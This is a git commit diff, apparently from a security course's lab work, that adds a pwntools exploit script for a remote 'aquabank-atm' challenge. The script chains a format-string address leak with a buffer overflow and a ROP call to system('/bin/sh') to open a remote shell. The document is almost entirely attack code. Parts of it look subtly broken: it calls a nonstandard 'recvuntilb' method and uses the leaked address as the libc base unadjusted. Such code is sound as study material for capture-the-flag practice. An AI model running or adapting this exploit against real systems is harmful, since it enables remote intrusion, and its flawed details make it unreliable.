rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/lab3_4_recap/02_aquabank_atm/solve.py.bak
+++ b/lab3_4_recap/02_aquabank_atm/solve.py.bak
@@ -0,0 +1,55 @@
+from pwn import *
+
+OFF = 128  # On withdrawal
+# %25$lx
+context.binary = elf = ELF("./aquabank-atm", checksec=False)
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13508)
+PRINTF_GOT = elf.got["printf"]
+# Uso printf per stamparmi il libc address
+# Uso save note per salvarmi /bin/sh nel buffer
+# Salvo indirizzo di libc e chiamo system con /bin/sh
+p.recvuntil(b"> ")
+p.sendline(b"1")
+# payload = b"%114$p" (local offset)
+payload = b"%74$p"  # (remote offset)
+p.sendline(payload)
+p.recvuntilb(b"> ")
+p.sendline(b"2")
+p.recvuntil(b"--- Your customer note ---\n")
+addr = int(p.recvline().strip(), 16)
+libc.address = addr
+print(f"Address: {hex(addr)}")
+# Stage 2 write the binsh string at a fixed address (note array)
+binsh = b"/bin/sh"
+note_addr = 0x4040A0
+p.recvuntilb(b"> ")
+p.sendline(b"1")
+p.sendline(binsh)
+print(p.recvuntilb(b"> "))
+#
+# Stage 3 Buffer overflow and system call
+p.sendline(b"3")
+print(p.recvuntil(b"From account: "))
+p.sendline(b"A")
+print(p.recvuntil(b"Amount: "))
+p.sendline(b"10")
+print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
+ret = 0x000000000040101A
+ret_libc = 0x000000000002882F
+pop_rdi = 0x000000000010F78B
+payload = flat(
+    b"A" * (OFF),
+    # p64(ret),
+    p64(libc.address + pop_rdi),
+    p64(note_addr),
+    p64(
+        libc.symbols["system"],
+    ),
+)
+p.sendline(payload)
+p.interactive()
+# %114$p
+# %130$p